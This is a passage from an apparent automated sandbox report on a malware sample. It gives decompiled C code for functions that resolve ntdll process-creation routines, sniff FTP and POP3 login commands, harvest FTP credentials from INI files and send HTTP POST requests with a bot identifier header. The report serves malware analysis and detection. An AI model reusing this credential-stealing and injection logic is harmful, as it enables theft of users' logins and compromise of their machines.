                						} else {
                							_t99 = _t101 - 1;
                							_t115 = _t67 >> _t99 & 0x00000001;
                						}
                						_t116 = _t115 + _v8 * 2;
                						_v8 = _t116;
                						if(_t116 == 0) {
                							_v8 = 1;
                							do {
                								if(_t99 <= 0) {
                									_t125 =  *(_t98 + _t71);
                									_t98 = _t98 + 4;
                									_t102 = 0x1f;
                									_t126 = _t125 >> 0x1f;
                								} else {
                									_t102 = _t99 - 1;
                									_t126 = _t67 >> _t102 & 0x00000001;
                								}
                								_v8 = _t126 + _v8 * 2;
                								if(_t102 <= 0) {
                									_t67 =  *(_t98 + _t71);
                									_t98 = _t98 + 4;
                									_t99 = 0x1f;
                									_t128 = _t67 >> 0x1f;
                								} else {
                									_t99 = _t102 - 1;
                									_t128 = _t67 >> _t99 & 0x00000001;
                								}
                							} while (_t128 == 0);
                							_v8 = _v8 + 2;
                						}
                						asm("sbb ecx, ecx");
                						_v8 = _v8 +  ~0xd00;
                						_t87 = _v16;
                						_t119 = _t87 - _v12 + _a12;
                						_v16 = _t119;
                						 *((char*)(_t87 + _a12)) =  *_t119;
                						_t88 = _t87 + 1;
                						_v16 = _v16 + 1;
                						do {
                							 *((char*)(_t88 + _a12)) =  *_v16;
                							_t88 = _t88 + 1;
                							_v16 = _v16 + 1;
                							_t57 =  &_v8;
                							 *_t57 = _v8 - 1;
                						} while ( *_t57 != 0);
                						_v16 = _t88;
                						goto L6;
                					}
                					_t79 = ( *(_t98 + _t71) & 0x000000ff) + (_t111 + 0xfffffffd << 8);
                					_t98 = _t98 + 1;
                					if(_t79 != 0xffffffff) {
                						_t81 = _t79 + 1;
                						_v20 = _t81;
                						goto L19;
                					}
                					_t68 = _a16;
                					 *_t68 = _v16;
                					return _t68 & 0xffffff00 | _t98 == _a8;
                				}
                			}

                Memory Dump Source
                • Source File: 00000000.00000002.198011061.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                • Associated: 00000000.00000002.198006925.0000000000400000.00000002.00020000.sdmp
                • Associated: 00000000.00000002.198032343.0000000000419000.00000004.00020000.sdmp
                • Associated: 00000000.00000002.198049437.000000000041B000.00000002.00020000.sdmp
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_400000_executable.jbxd
                Yara matches
                Similarity
                • API ID:
                • String ID:
                • API String ID:
                • Opcode ID: 3e65220d72b0552e9fc1fb6bbe11ff6f12cdf0da83dde93640108036a636b790
                • Instruction ID: 66392101b20d4fd1da8d41004f6e2211efc2af99ea2e934d81e7eda41824d63f
                • Opcode Fuzzy Hash: 3e65220d72b0552e9fc1fb6bbe11ff6f12cdf0da83dde93640108036a636b790
                • Instruction Fuzzy Hash: FA51C336E00525DBDB248F98C4906ADB7B1EF85324F1A46BACD16BF3C1C675AD41DB80
                Uniqueness

                Uniqueness Score: -1.00%

                C-Code - Quality: 100%
                			E0040B65A() {
                				signed int _t18;
                				signed int _t38;
                				signed int _t55;
                				signed int _t56;
                				signed int* _t59;
                				signed int _t60;
                				signed int* _t61;
                
                				_t18 =  *0x41a578; // 0x1
                				if(_t18 >= 0x270) {
                					_t60 = 0;
                					do {
                						_t55 = _t60 << 2;
                						_t1 = _t55 + 0x419bac; // 0xfed31d4f
                						_t2 = 0x419ba8 + _t55; // 0xc0004aad
                						_t3 = 0x419ba8 + _t55; // 0xc0004aad
                						_t6 = _t55 + 0x41a1dc; // 0x2176531b
                						_t60 = _t60 + 1;
                						 *(0x419ba8 + _t55) = (( *_t1 ^  *_t2) & 0x7fffffff ^  *_t3) >> 0x00000001 ^  *(0x419180 + ((( *_t1 ^  *_t2) & 0x7fffffff ^  *_t3) & 0x00000001) * 4) ^  *_t6;
                					} while (_t60 < 0xe3);
                					if(_t60 < 0x26f) {
                						_t59 =  &(0x419ba8[_t60]);
                						do {
                							_t10 =  &(_t59[1]); // 0x4
                							_t61 = _t10;
                							 *_t59 =  *(0x419180 + ((( *_t59 ^  *_t61) & 0x7fffffff ^  *_t59) & 0x00000001) * 4) ^  *(_t61 - 0x390) ^ (( *_t59 ^  *_t61) & 0x7fffffff ^  *_t59) >> 0x00000001;
                							_t59 = _t61;
                						} while (_t59 < 0x41a564);
                					}
                					_t56 =  *0x41a564; // 0xf488ac72
                					_t38 =  *0x419ba8; // 0xc0004aad
                					 *0x41a564 = ((_t38 ^ _t56) & 0x7fffffff ^ _t56) >> 0x00000001 ^  *(0x419180 + (((_t38 ^ _t56) & 0x7fffffff ^ _t56) & 0x00000001) * 4) ^  *0x41a1d8;
                					_t18 = 0;
                				}
                				 *0x41a578 = _t18 + 1;
                				return (0x419ba8[_t18] ^ 0x419ba8[_t18] >> 0x0000000b ^ ((0x419ba8[_t18] ^ 0x419ba8[_t18] >> 0x0000000b) & 0xff3a58ad) << 0x00000007 ^ ((0x419ba8[_t18] ^ 0x419ba8[_t18] >> 0x0000000b ^ ((0x419ba8[_t18] ^ 0x419ba8[_t18] >> 0x0000000b) & 0xff3a58ad) << 0x00000007) & 0xffffdf8c) << 0x0000000f) >> 0x00000012 ^ 0x419ba8[_t18] ^ 0x419ba8[_t18] >> 0x0000000b ^ ((0x419ba8[_t18] ^ 0x419ba8[_t18] >> 0x0000000b) & 0xff3a58ad) << 0x00000007 ^ ((0x419ba8[_t18] ^ 0x419ba8[_t18] >> 0x0000000b ^ ((0x419ba8[_t18] ^ 0x419ba8[_t18] >> 0x0000000b) & 0xff3a58ad) << 0x00000007) & 0xffffdf8c) << 0x0000000f;
                			}

                Memory Dump Source
                • Source File: 00000000.00000002.198011061.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                • Associated: 00000000.00000002.198006925.0000000000400000.00000002.00020000.sdmp
                • Associated: 00000000.00000002.198032343.0000000000419000.00000004.00020000.sdmp
                • Associated: 00000000.00000002.198049437.000000000041B000.00000002.00020000.sdmp
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_400000_executable.jbxd
                Yara matches
                Similarity
                • API ID:
                • String ID:
                • API String ID:
                • Opcode ID: f410da16a933331692006821d7277e76283c3cd78b8982641975c42ce8ce4740
                • Instruction ID: 6769b1db74bd83bc0a3a43a485cf3d1d505ca6aa5d13b18bf1ae29d086b6149f
                • Opcode Fuzzy Hash: f410da16a933331692006821d7277e76283c3cd78b8982641975c42ce8ce4740
                • Instruction Fuzzy Hash: DF217F323254019FD708CF38ECA9AD633E2F789358719897DD519CB290D63AE853DB49
                Uniqueness

                Uniqueness Score: -1.00%

                Memory Dump Source
                • Source File: 00000000.00000002.198011061.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                • Associated: 00000000.00000002.198006925.0000000000400000.00000002.00020000.sdmp
                • Associated: 00000000.00000002.198032343.0000000000419000.00000004.00020000.sdmp
                • Associated: 00000000.00000002.198049437.000000000041B000.00000002.00020000.sdmp
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_400000_executable.jbxd
                Yara matches
                Similarity
                • API ID:
                • String ID:
                • API String ID:
                • Opcode ID: 37a1001b93998f984f4d2d731be7b22ab631ba7269735dfd8c29eb6a4b7eac65
                • Instruction ID: 2942c08de1fa596666361ff0938991d7902a9c36578c64e2544f4b6332540ea4
                • Opcode Fuzzy Hash: 37a1001b93998f984f4d2d731be7b22ab631ba7269735dfd8c29eb6a4b7eac65
                • Instruction Fuzzy Hash: 8DE0DF7A3000108BC710CA12D480943B7B2FBC8330B128AB6D8168B345C938FDC385D1
                Uniqueness

                Uniqueness Score: -1.00%

                Control-flow Graph
                C-Code - Quality: 100%
                			E004073D9(void* __edx, signed int _a4) {
                				void* __edi;
                				void* _t4;
                				struct HINSTANCE__* _t6;
                				void* _t7;
                				struct HINSTANCE__* _t8;
                				_Unknown_base(*)()* _t15;
                				struct HINSTANCE__* _t16;
                				void* _t19;
                				void* _t20;
                				intOrPtr _t21;
                
                				_t20 = __edx;
                				_t21 = E0040EBCB();
                				 *0x4192e8 = _t21;
                				if(_t21 != 0) {
                					__eflags = _a4 & 0x00000001;
                					if((_a4 & 0x00000001) != 0) {
                						_t4 = E00407311(_t19, _t20, _t21, "GetProcAddress");
                						_t6 = E0040F132(_t19,  *0x4192e4, E00407311(_t19, _t20, _t21, "LoadLibraryA"), _t4);
                						__eflags = _t6;
                						if(_t6 == 0) {
                							L4:
                							_t7 = 0;
                							__eflags = 0;
                							L5:
                							return _t7;
                						}
                						L8:
                						_t8 = GetModuleHandleW(L"ntdll.dll");
                						 *0x4192ec = _t8;
                						__eflags = _t8;
                						if(_t8 == 0) {
                							goto L4;
                						}
                						 *0x4192f0 = GetProcAddress(_t8, "NtCreateThread");
                						 *0x4192f4 = GetProcAddress( *0x4192ec, "NtCreateUserProcess");
                						 *0x4192f8 = GetProcAddress( *0x4192ec, "NtQueryInformationProcess");
                						 *0x4192fc = GetProcAddress( *0x4192ec, "RtlCreateUserThread");
                						 *0x419300 = GetProcAddress( *0x4192ec, "RtlUserThreadStart");
                						 *0x419304 = GetProcAddress( *0x4192ec, "LdrLoadDll");
                						_t15 = GetProcAddress( *0x4192ec, "LdrGetDllHandle");
                						 *0x419308 = _t15;
                						__eflags =  *0x4192f0; // 0x77e599e0
                						if(__eflags != 0) {
                							L11:
                							__eflags =  *0x4192f8; // 0x77e59670
                							if(__eflags == 0) {
                								goto L4;
                							}
                							__eflags =  *0x4192fc; // 0x77e57550
                							if(__eflags == 0) {
                								goto L4;
                							}
                							__eflags =  *0x419304; // 0x77e27840
                							if(__eflags == 0) {
                								goto L4;
                							}
                							__eflags = _t15;
                							if(_t15 == 0) {
                								goto L4;
                							}
                							_t7 = 1;
                							goto L5;
                						}
                						__eflags =  *0x4192f4; // 0x77e5a120
                						if(__eflags == 0) {
                							goto L4;
                						}
                						goto L11;
                					}
                					_t16 = GetModuleHandleW(0);
                					 *0x4192e4 = _t16;
                					__eflags = _t16;
                					if(_t16 != 0) {
                						goto L8;
                					}
                					goto L4;
                				}
                				return 0;
                			}

                APIs
                • GetModuleHandleW.KERNEL32(00000000,00000000,?,00000000,004077C2), ref: 00407401
                • GetModuleHandleW.KERNEL32(ntdll.dll,00000000,LoadLibraryA,00000000,GetProcAddress,00000000,?,00000000,004077C2), ref: 0040743E
                • GetProcAddress.KERNEL32(00000000,NtCreateThread), ref: 00407455
                • GetProcAddress.KERNEL32(NtCreateUserProcess), ref: 00407467
                • GetProcAddress.KERNEL32(NtQueryInformationProcess), ref: 00407479
                • GetProcAddress.KERNEL32(RtlCreateUserThread), ref: 0040748B
                • GetProcAddress.KERNEL32(RtlUserThreadStart), ref: 0040749D
                • GetProcAddress.KERNEL32(LdrLoadDll), ref: 004074AF
                • GetProcAddress.KERNEL32(LdrGetDllHandle), ref: 004074C1
                Strings
                Memory Dump Source
                • Source File: 00000000.00000002.198011061.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                • Associated: 00000000.00000002.198006925.0000000000400000.00000002.00020000.sdmp
                • Associated: 00000000.00000002.198032343.0000000000419000.00000004.00020000.sdmp
                • Associated: 00000000.00000002.198049437.000000000041B000.00000002.00020000.sdmp
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_400000_executable.jbxd
                Yara matches
                Similarity
                • API ID: AddressProc$HandleModule
                • String ID: @xw$GetProcAddress$LdrGetDllHandle$LdrLoadDll$LoadLibraryA$NtCreateThread$NtCreateUserProcess$NtQueryInformationProcess$RtlCreateUserThread$RtlUserThreadStart$ntdll.dll
                • API String ID: 667068680-2525058245
                • Opcode ID: cd293f4c60bc6f914a2b1dacce8efa09c38baa10aeecff3b2ea2009002d9643f
                • Instruction ID: 3a20010c5c1cb7ddc541a9f25b56d73d7092df28e1e2c85fbe0d47f7a82f3eb2
                • Opcode Fuzzy Hash: cd293f4c60bc6f914a2b1dacce8efa09c38baa10aeecff3b2ea2009002d9643f
                • Instruction Fuzzy Hash: 04214D71E05216BACF21AFB1ADD99D63F54A604704310C8BBED10B32E2D2BC1C41DA5E
                Uniqueness

                Uniqueness Score: -1.00%

                Control-flow Graph
                C-Code - Quality: 90%
                			E00404F4A(char* __eax, intOrPtr _a4, intOrPtr _a8) {
                				char _v536;
                				char _v652;
                				char _v656;
                				char* _v660;
                				char _v661;
                				char _v664;
                				intOrPtr _v672;
                				signed char _v673;
                				void* __edi;
                				void* __esi;
                				char* _t39;
                				char* _t45;
                				char* _t47;
                				intOrPtr _t48;
                				intOrPtr _t55;
                				char* _t57;
                				char* _t59;
                				char* _t61;
                				char* _t63;
                				char _t64;
                				void* _t67;
                				intOrPtr _t80;
                				intOrPtr _t81;
                				intOrPtr _t82;
                				void* _t90;
                				void* _t92;
                				intOrPtr _t93;
                				char* _t95;
                				void* _t97;
                				intOrPtr _t100;
                				void* _t101;
                				char* _t102;
                				void* _t103;
                				intOrPtr* _t104;
                
                				_t95 = __eax;
                				if(_a4 == 0xffffffff || __eax == 0) {
                					L50:
                					_t39 = 0;
                					__eflags = 0;
                				} else {
                					_t100 = _a8;
                					if(_t100 > 0x200) {
                						goto L50;
                					} else {
                						if(_t100 <= 6 || E00409868("USER ", __eax, 5) != 0 && E00409868("PASS ", _t95, 5) != 0) {
                							__eflags = _t100 - 1;
                							if(_t100 <= 1) {
                								goto L50;
                							} else {
                								EnterCriticalSection(0x4191a8);
                								_t80 = E00404E3E(_a4);
                								__eflags = _t80;
                								if(_t80 != 0) {
                									__eflags =  *((intOrPtr*)(_t80 + 4));
                									if( *((intOrPtr*)(_t80 + 4)) == 0) {
                										L47:
                										_push(0);
                										goto L48;
                									} else {
                										__eflags =  *((intOrPtr*)(_t80 + 8));
                										if( *((intOrPtr*)(_t80 + 8)) == 0) {
                											goto L47;
                										} else {
                											__eflags = _t100 - 3;
                											if(_t100 < 3) {
                												L32:
                												_t101 = 4;
                												__eflags = _a8 - _t101;
                												if(_a8 >= _t101) {
                													_t45 = E00409868(_t95, "TYPE", _t101);
                													__eflags = _t45;
                													if(_t45 == 0) {
                														goto L36;
                													} else {
                														_t57 = E00409868(_t95, "FEAT", _t101);
                														__eflags = _t57;
                														if(_t57 == 0) {
                															goto L36;
                														} else {
                															_t59 = E00409868(_t95, "PASV", _t101);
                															__eflags = _t59;
                															if(_t59 != 0) {
                																_t61 = E00409868(_t95, "STAT", _t101);
                																__eflags = _t61;
                																if(_t61 == 0) {
                																	L39:
                																	_v661 = 0x65;
                																	_v660 = L"pop3";
                																	goto L40;
                																} else {
                																	_t63 = E00409868(_t95, "LIST", _t101);
                																	__eflags = _t63;
                																	if(_t63 == 0) {
                																		goto L39;
                																	}
                																}
                															} else {
                																goto L36;
                															}
                														}
                													}
                												}
                											} else {
                												_t64 =  *_t95;
                												__eflags = _t64 - 0x43;
                												if(_t64 == 0x43) {
                													L30:
                													__eflags =  *((char*)(_t95 + 1)) - 0x57;
                													if( *((char*)(_t95 + 1)) != 0x57) {
                														goto L32;
                													} else {
                														__eflags =  *((char*)(_t95 + 2)) - 0x44;
                														if( *((char*)(_t95 + 2)) == 0x44) {
                															L36:
                															_v661 = 0x64;
                															_v660 = L"ftp";
                															L40:
                															_t47 =  &_v652;
                															_v656 = 0x80;
                															__imp__#5(_a4, _t47,  &_v656);
                															__eflags = _t47;
                															if(_t47 == 0) {
                																_t84 =  &_v664;
                																_t48 = E0040CCDB( &_v664);
                																__eflags = _t48;
                																if(_t48 == 0) {
                																	__eflags = _v673 - 0x64;
                																	if(_v673 != 0x64) {
                																		L44:
                																		__eflags = _v673 - 0x65;
                																		if(_v673 == 0x65) {
                																			goto L45;
                																		}
                																	} else {
                																		_t84 =  *((intOrPtr*)(_t80 + 4));
                																		_t97 = 9;
                																		_t55 = E0040A457(L"anonymous",  *((intOrPtr*)(_t80 + 4)), _t97);
                																		__eflags = _t55;
                																		if(_t55 != 0) {
                																			L45:
                																			_t102 =  &_v536;
                																			E0040CC92( &_v664, _t84, _t102);
                																			_push(_t102);
                																			_push( *((intOrPtr*)(_t80 + 8)));
                																			_push( *((intOrPtr*)(_t80 + 4)));
                																			E00412544(_t84, _t92, __eflags, _v673 & 0x000000ff, 0, 0, L"%s://%s:%s@%s/", _v672);
                																		} else {
                																			goto L44;
                																		}
                																	}
                																}
                															}
                															_push(0);
                															L48:
                															E00404EDF(_t80);
                														} else {
                															goto L32;
                														}
                													}
                												} else {
                													__eflags = _t64 - 0x50;
                													if(_t64 != 0x50) {
                														goto L32;
                													} else {
                														goto L30;
                													}
                												}
                											}
                										}
                									}
                								}
                								_t81 = 0;
                								goto L22;
                							}
                						} else {
                							_t103 = _t100 + 0xfffffffb;
                							_t67 = 0;
                							_t90 = _t95 + 5;
                							if(_t103 <= 0) {
                								goto L50;
                							} else {
                								while(1) {
                									_t93 =  *((intOrPtr*)(_t67 + _t90));
                									if(_t93 == 0xd || _t93 == 0xa) {
                										break;
                									}
                									if(_t93 < 0x20) {
                										goto L50;
                									} else {
                										_t67 = _t67 + 1;
                										if(_t67 < _t103) {
                											continue;
                										} else {
                											break;
                										}
                									}
                									goto L51;
                								}
                								if(_t67 == 0 || _t67 == _t103) {
                									goto L50;
                								} else {
                									_t82 = E00409A3C(_t67, 0xfde9, _t90);
                									if(_t82 == 0) {
                										goto L50;
                									} else {
                										_v661 = 0;
                										EnterCriticalSection(0x4191a8);
                										_t104 = E00404E3E(_a4);
                										if(_t104 != 0) {
                											L17:
                											__eflags =  *_t95 - 0x55;
                											_v661 = 1;
                											if( *_t95 != 0x55) {
                												E004097F7( *((intOrPtr*)(_t104 + 8)));
                												 *((intOrPtr*)(_t104 + 8)) = _t82;
                											} else {
                												E00404EDF(_t104, 1);
                												 *((intOrPtr*)(_t104 + 4)) = _t82;
                											}
                											 *_t104 = _a4;
                										} else {
                											_t104 = E00404E77(_a4);
                											if(_t104 != 0) {
                												goto L17;
                											} else {
                												E004097F7(_t82);
                											}
                										}
                										_t81 = _v661;
                										L22:
                										LeaveCriticalSection(0x4191a8);
                										_t39 = _t81;
                									}
                								}
                							}
                						}
                					}
                				}
                				L51:
                				return _t39;
                			}

                APIs
                • EnterCriticalSection.KERNEL32(004191A8,0000FDE9,?,00000005), ref: 00405007
                • LeaveCriticalSection.KERNEL32(004191A8,?,000000FF), ref: 00405062
                • EnterCriticalSection.KERNEL32(004191A8), ref: 0040507D
                • getpeername.WS2_32(000000FF,00000004,00000004), ref: 0040515A
                Strings
                Memory Dump Source
                • Source File: 00000000.00000002.198011061.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                • Associated: 00000000.00000002.198006925.0000000000400000.00000002.00020000.sdmp
                • Associated: 00000000.00000002.198032343.0000000000419000.00000004.00020000.sdmp
                • Associated: 00000000.00000002.198049437.000000000041B000.00000002.00020000.sdmp
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_400000_executable.jbxd
                Yara matches
                Similarity
                • API ID: CriticalSection$Enter$Leavegetpeername
                • String ID: %s://%s:%s@%s/$FEAT$LIST$PASS $PASV$STAT$TYPE$USER $anonymous$e$ftp$pop3
                • API String ID: 1099368488-1497436601
                • Opcode ID: a78e4b605bb7dce220fca66528b18a592da3fdd5101b89c53ee9855d16ef0e57
                • Instruction ID: 41f81782623d15271c447531b7a8a7657cff6ecb66a7124e14311163c83fe11a
                • Opcode Fuzzy Hash: a78e4b605bb7dce220fca66528b18a592da3fdd5101b89c53ee9855d16ef0e57
                • Instruction Fuzzy Hash: 6D610831A04B41A6DB20AA258C4176F7A99DF51344F04853FF994BE3D2D77DCC448BAE
                Uniqueness

                Uniqueness Score: -1.00%

                Control-flow Graph

                C-Code - Quality: 100%
                			E00404846(intOrPtr* _a4) {
                				void _v12;
                				long _v16;
                				void* _v20;
                				void* _v24;
                				char _v26;
                				short _v28;
                				char* _v36;
                				char* _v40;
                				void* _v44;
                				intOrPtr _v48;
                				char _v532;
                				char _v536;
                				void* __ebx;
                				void* __esi;
                				void* _t57;
                				void* _t60;
                				intOrPtr _t62;
                				signed int _t69;
                				void _t90;
                				void* _t94;
                				intOrPtr* _t97;
                				void* _t98;
                				void _t99;
                				char* _t100;
                				void* _t113;
                
                				_t97 = _a4;
                				if(E0040F919( &_v40,  *((intOrPtr*)(_t97 + 4))) == 0) {
                					L26:
                					return 0;
                				}
                				_t57 = InternetOpenA( *0x419548, 0, 0, 0, 0);
                				_v44 = _t57;
                				if(_t57 == 0) {
                					L25:
                					E004097F7(_v40);
                					E004097F7(_v36);
                					goto L26;
                				}
                				_t60 = InternetConnectA(_t57, _v40, _v28, 0, 0, 3, 0, 0);
                				_v20 = _t60;
                				if(_t60 == 0) {
                					L24:
                					InternetCloseHandle(_v44);
                					goto L25;
                				}
                				_t62 =  *_t97;
                				_t100 = "POST";
                				if( *((char*)(_t62 + 0x14)) != 1) {
                					_t100 = "GET";
                				}
                				_t98 = HttpOpenRequestA(_v20, _t100, _v36, "HTTP/1.1",  *(_t62 + 4), 0, (0 | _v26 != 0x00000002) - 0x00000001 & 0x00800000 | 0x8404f700, 0);
                				_v24 = _t98;
                				if(_t98 == 0) {
                					L23:
                					InternetCloseHandle(_v20);
                					goto L24;
                				} else {
                					E00407B82(_t100,  &_v536);
                					_t68 =  *_a4;
                					if( *((intOrPtr*)( *_a4 + 0x1c)) > 0) {
                						_t94 = E0040A545( &_v16, "Content-Type: %s\r\n",  *((intOrPtr*)(_t68 + 0x18)));
                						_t113 = _t113 + 0xc;
                						if(_t94 > 0) {
                							HttpAddRequestHeadersA(_t98, _v16, 0xffffffff, 0xa0000000);
                							E004097F7(_v16);
                						}
                					}
                					_t69 = E0040A3AA( &_v532);
                					_v12 = _t69;
                					_t72 = 2 + _t69 * 6;
                					if(2 + _t69 * 6 == 0) {
                						L12:
                						_v12 = 0;
                						goto L13;
                					} else {
                						_t90 = E004097CC(_t72);
                						_v48 = _t90;
                						if(_t90 == 0) {
                							goto L12;
                						}
                						_t99 = _t90;
                						E0040FC4C(_t99,  &_v532, _v12);
                						_t98 = _v24;
                						_v12 = _t99;
                						L13:
                						if(_v12 != 0 && E0040A545( &_v16, "ZCID: %S\r\n", _v12) > 0) {
                							HttpAddRequestHeadersA(_t98, _v16, 0xffffffff, 0xa0000000);
                							E004097F7(_v16);
                						}
                						E004097F7(_v12);
                						if(HttpSendRequestA(_t98, 0, 0,  *( *_a4 + 0x20),  *( *_a4 + 0x24)) != 1) {
                							L22:
                							InternetCloseHandle(_t98);
                							goto L23;
                						} else {
                							_v16 = 4;
                							_v12 = 0;
                							if(HttpQueryInfoA(_t98, 0x20000013,  &_v12,  &_v16, 0) != 1 || _v12 != 0xc8) {
                								goto L22;
                							} else {
                								if(E0040AF2B( &_v16, _t98) != 0) {
                									E004097F7(_t81);
                								}
                								E004097F7(_v40);
                								E004097F7(_v36);
                								 *(_a4 + 8) = _v24;
                								goto L26;
                							}
                						}
                					}
                				}
                			}

                APIs
                  • Part of subcall function 0040F919: InternetCrackUrlA.WININET(?,00000000,00000000,?), ref: 0040F948
                • InternetOpenA.WININET(00000000,00000000,00000000,00000000,?), ref: 00404874
                • InternetConnectA.WININET(00000000,?,?,00000000,00000000,00000003,00000000,00000000), ref: 00404892
                • HttpOpenRequestA.WININET(?,POST,?,HTTP/1.1,?,00000000,-00000001,00000000), ref: 004048DD
                • HttpAddRequestHeadersA.WININET(00000000,?,000000FF,A0000000), ref: 0040492F
                • HttpAddRequestHeadersA.WININET(00000000,?,000000FF,A0000000), ref: 004049A0
                • HttpSendRequestA.WININET(00000000,00000000,00000000,?,?), ref: 004049C0
                • HttpQueryInfoA.WININET(00000000,20000013,?,?,00000000), ref: 004049E4
                • InternetCloseHandle.WININET(00000000), ref: 00404A27
                • InternetCloseHandle.WININET(?), ref: 00404A30
                  • Part of subcall function 0040AF2B: InternetQueryOptionA.WININET(00000000,00000022,00000000,00000004), ref: 0040AF3F
                  • Part of subcall function 0040AF2B: GetLastError.KERNEL32 ref: 0040AF45
                  • Part of subcall function 0040AF2B: InternetQueryOptionA.WININET(00000022,00000022,00000000,00000004), ref: 0040AF69
                  • Part of subcall function 004097F7: HeapFree.KERNEL32(00000000,00000000,0040F4F2,00000000,?,?,?,?,00407564,00000000,00407832), ref: 0040980A
                • InternetCloseHandle.WININET(?), ref: 00404A39
                Strings
                Memory Dump Source
                • Source File: 00000000.00000002.198011061.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                • Associated: 00000000.00000002.198006925.0000000000400000.00000002.00020000.sdmp
                • Associated: 00000000.00000002.198032343.0000000000419000.00000004.00020000.sdmp
                • Associated: 00000000.00000002.198049437.000000000041B000.00000002.00020000.sdmp
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_400000_executable.jbxd
                Yara matches
                Similarity
                • API ID: Internet$Http$Request$CloseHandleQuery$HeadersOpenOption$ConnectCrackErrorFreeHeapInfoLastSend
                • String ID: Content-Type: %s$GET$HTTP/1.1$POST$ZCID: %S
                • API String ID: 1023423486-1483906197
                • Opcode ID: 6e4c28c2d5e9fec90003e8ccb70b3b2aff4d0fd502f898f28901ed64ef10fc26
                • Instruction ID: 96c450595c7bb05133d8431c0057e0f42123c392022799eca07488b1e8148781
                • Opcode Fuzzy Hash: 6e4c28c2d5e9fec90003e8ccb70b3b2aff4d0fd502f898f28901ed64ef10fc26
                • Instruction Fuzzy Hash: FA516DB1D00109BFCF11AFA5CD89D9E7FB9FB89704F10447AF601B62A1D6399A40DB28
                Uniqueness

                Uniqueness Score: -1.00%

                Control-flow Graph

                • Executed
                • Not Executed
                C-Code - Quality: 91%
                			E00405B9D(void* __ecx, signed char* __edx, void* __eflags, intOrPtr _a4) {
                				short _v524;
                				short _v528;
                				int _v532;
                				WCHAR* _v536;
                				WCHAR* _v540;
                				WCHAR* _v544;
                				WCHAR* _v548;
                				intOrPtr _v552;
                				void* __edi;
                				WCHAR* _t42;
                				long _t43;
                				intOrPtr _t52;
                				int _t57;
                				void* _t65;
                				short* _t77;
                				WCHAR* _t85;
                				WCHAR* _t86;
                				intOrPtr _t88;
                				signed int _t93;
                				void* _t95;
                
                				_t95 = (_t93 & 0xfffffff8) - 0x21c;
                				if(E0040B635( &(__edx[0x2c]),  &_v524, __ecx) == 0) {
                					L21:
                					return 1;
                				}
                				if(( *__edx & 0x00000010) == 0) {
                					_t42 = HeapAlloc( *0x41a570, 8, 0x20002);
                					_v540 = _t42;
                					if(_t42 == 0) {
                						goto L21;
                					}
                					_t43 = GetPrivateProfileStringW(0, 0, 0, _t42, 0xffff,  &_v524);
                					if(_t43 <= 0) {
                						L20:
                						E004097F7(_v540);
                						goto L21;
                					}
                					_t9 = _t43 + 1; // 0x1
                					if(E0040A6AE(_v540, _t9) == 0) {
                						goto L20;
                					}
                					_t85 = HeapAlloc( *0x41a570, 8, 0xc20);
                					_v536 = _t85;
                					if(_t85 == 0) {
                						goto L20;
                					} else {
                						_t12 =  &(_t85[0x1fe]); // 0x3fc
                						_v532 =  &(_t12[0xff]);
                						_v544 = _v540;
                						goto L9;
                						L18:
                						_t52 = E0040A6EC(_v548, 1);
                						_v552 = _t52;
                						if(_t52 != 0) {
                							_t85 = _v540;
                							L9:
                							if(StrStrIW(_v544, L"_config_") == 0 && GetPrivateProfileStringW(_v548, L"HOST", 0, _t85, 0xff,  &_v528) > 0) {
                								_t57 = GetPrivateProfileIntW(_v548, L"PORT", 0x15,  &_v528);
                								_v532 = _t57;
                								if(_t57 - 1 <= 0xfffe) {
                									_t86 =  &(_t85[0xff]);
                									if(GetPrivateProfileStringW(_v548, L"UID", 0, _t86, 0xff,  &_v528) > 0) {
                										_t26 =  &(_t86[0xff]); // 0x0
                										if(GetPrivateProfileStringW(_v548, L"PWD", 0, _t26, 0xff,  &_v528) > 0) {
                											_t28 =  &(_t86[0xff]); // 0x0
                											_t77 = _t28;
                											if(E0040A3AA(_t77) > 0) {
                												_push(_v532);
                												_push(_v540);
                												_push(_t77);
                												_push(_t86);
                												_t87 = _v536;
                												_t65 = E0040A4B7(_t64, 0x311, _v536, L"ftp://%s:%s@%s:%u\n");
                												_t95 = _t95 + 0x14;
                												if(_t65 > 0) {
                													_t88 = _a4;
                													if(E00409B2A(_t65, _t88, _t87) != 0) {
                														 *((intOrPtr*)(_t88 + 4)) =  *((intOrPtr*)(_t88 + 4)) + 1;
                													}
                												}
                											}
                										}
                									}
                								}
                							}
                							goto L18;
                						} else {
                							E004097F7(_v540);
                							goto L20;
                						}
                					}
                				} else {
                					E00405B75( &_v524, _a4);
                					goto L21;
                				}
                			}

                APIs
                  • Part of subcall function 0040B635: PathCombineW.SHLWAPI(?,?,00401EC0,004076D9,?,?,?,00000000), ref: 0040B64C
                • HeapAlloc.KERNEL32(00000008,00020002,?), ref: 00405BED
                • GetPrivateProfileStringW.KERNEL32 ref: 00405C11
                • HeapAlloc.KERNEL32(00000008,00000C20), ref: 00405C3C
                • StrStrIW.SHLWAPI(?,_config_), ref: 00405C77
                • GetPrivateProfileStringW.KERNEL32 ref: 00405C97
                • GetPrivateProfileIntW.KERNEL32 ref: 00405CB1
                • GetPrivateProfileStringW.KERNEL32 ref: 00405CDF
                • GetPrivateProfileStringW.KERNEL32 ref: 00405CFD
                Memory Dump Source
                • Source File: 00000000.00000002.198011061.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                • Associated: 00000000.00000002.198006925.0000000000400000.00000002.00020000.sdmp
                • Associated: 00000000.00000002.198032343.0000000000419000.00000004.00020000.sdmp
                • Associated: 00000000.00000002.198049437.000000000041B000.00000002.00020000.sdmp
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_400000_executable.jbxd
                Similarity
                • API ID: PrivateProfile$String$AllocHeap$CombinePath
                • String ID: HOST$PORT$PWD$UID$_config_$ftp://%s:%s@%s:%u
                Uniqueness

